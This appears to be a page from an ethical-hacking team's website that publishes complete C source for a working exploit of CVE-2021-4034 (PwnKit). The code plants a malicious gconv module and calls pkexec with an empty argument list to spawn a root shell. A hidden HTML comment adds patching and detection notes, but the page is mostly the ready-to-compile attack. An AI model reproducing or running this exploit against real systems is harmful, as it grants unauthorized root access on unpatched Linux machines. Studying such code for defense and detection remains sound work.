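<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="Tenacious is a mostly positive term. If someone calls you tenacious you're probably the kind of person who never gives up and never stops trying; someone who does whatever is required to accomplish a goal. In our efforts to learn the craft of Ethical Hacking, we are T3n4ci0us!" />
  <meta name="author" content="Rob" />
  <title>T3n4ci0us - cve-2021-4034</title>
  <link rel="icon" type="image/png" href="Guy-Fawkes.png" />
  <link rel="stylesheet" href="css/reset.css">
  <link rel="stylesheet" href="css/cts.css">
  <!-- NOTE(review): navChange(), used by the menu link below, is presumably defined in this script; confirm. -->
  <script src="js/flag.js"></script>
  <style>
    /* Bar pinned to the bottom edge of the viewport, content centred. */
    #bottom{
      width: 100%;
      position: fixed;
      bottom: 7px;
      text-align: center;
    }
    /* Grey serif link style, darker on hover. */
    .cts {
      color: #C0C0C0;
      font-weight: bold;
      font-family: serif;
      font-size: 12pt;
      text-decoration: none;
    }
    .cts:hover {
      color: #808080;
    }
    /* Dark panel that holds the source listing. */
    div.codescreen {
      background-color: #151B24;
      font-size: 12pt;
      margin: auto;
      width: 65%;
      text-align: left;
      padding: 10px;
    }
    /* Widen the listing panel on narrow screens. */
    @media screen and (max-width: 820px) {
      div.codescreen {
        width: 90%;
      }
    }
  </style>
</head>
<body>
  <div class="hero-image">
    <div class="hero-text">
      <a href="index.html" border="0" title="T3n4ci0us Hacking Team"><img src="Kali-Dragon.png" alt="T3n4ci0us Hacking Team" /></a>
    </div>
  </div>
  <div class="rc_nav" id="centered_nav">
    <a href="https://gchq.github.io/CyberChef/">CyberChef</a>
    <a href="cve-2021-4034.html" title="cve-2021-4034.c">cve-2021-4034.c</a>
    <a href="https://discord.com/channels/659793144711217163/787023376546922496">Discord</a>
    <a href="javascript:void(0);" title="Menu" style="font-size:18px;" class="icon" onclick="navChange()">☰</a>
  </div>
  <div class="rc_content">
    <!--
      Reviewer context for the listing below.

      What it is: CVE-2021-4034 ("PwnKit") is a local privilege escalation in
      polkit's setuid-root pkexec. pkexec does not handle an empty argument
      vector, which is why the listing's execve() call passes an empty argv
      and carries everything in the environment array instead.

      Mitigation: install the distribution's patched polkit package. Where
      patching has to wait, the stopgap published with the advisory is to
      remove the setuid bit from pkexec (chmod 0755 /usr/bin/pkexec); that
      also disables legitimate pkexec use until the package is updated.

      Detection: look for pkexec executed with no arguments at all, for
      directories or files whose names contain "GCONV_PATH=" in user-writable
      locations, and for a root shell whose parent is pkexec. pkexec typically
      logs that the SHELL value was not found in /etc/shells when this path is
      hit; confirm the exact message on the target distribution. The payload
      string in the listing removes its own working directories, so file
      artefacts may be gone after a run; process and log telemetry are the
      more reliable sources.

      Markup: angle brackets inside the listing are written as entities.
      Unescaped, the browser parses the header names as unknown tags and the
      include lines render without them.
    -->
    <div class="codescreen">
      /*<br />
      * Proof of Concept: pkexec (CVE-2021-4034)<br />
      * gcc cve-2021-4034.c -o getroot<br />
      */<br />
      #include &lt;stdio.h&gt;<br />
      #include &lt;stdlib.h&gt;<br />
      #include &lt;unistd.h&gt;<br />
      char *shell = <br />
      "#include &lt;stdio.h&gt;\n"<br />
      "#include &lt;stdlib.h&gt;\n"<br />
      "#include &lt;unistd.h&gt;\n\n"<br />
      "void gconv() {}\n"<br />
      "void gconv_init() {\n"<br />
      " setuid(0); setgid(0);\n"<br />
      " seteuid(0); setegid(0);\n"<br />
      " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"<br />
      " exit(0);\n"<br />
      "}";<br />
      <br />
      int main(int argc, char *argv[]) {<br />
      FILE *fp;<br />
      system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");<br />
      system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' &gt; pwnkit/gconv-modules");<br />
      fp = fopen("pwnkit/pwnkit.c", "w");<br />
      fprintf(fp, "%s", shell);<br />
      fclose(fp);<br />
      system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");<br />
      char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };<br />
      execve("/usr/bin/pkexec", (char*[]){NULL}, env);<br />
      }<br />
    </div>
  </div>
</body>
</html>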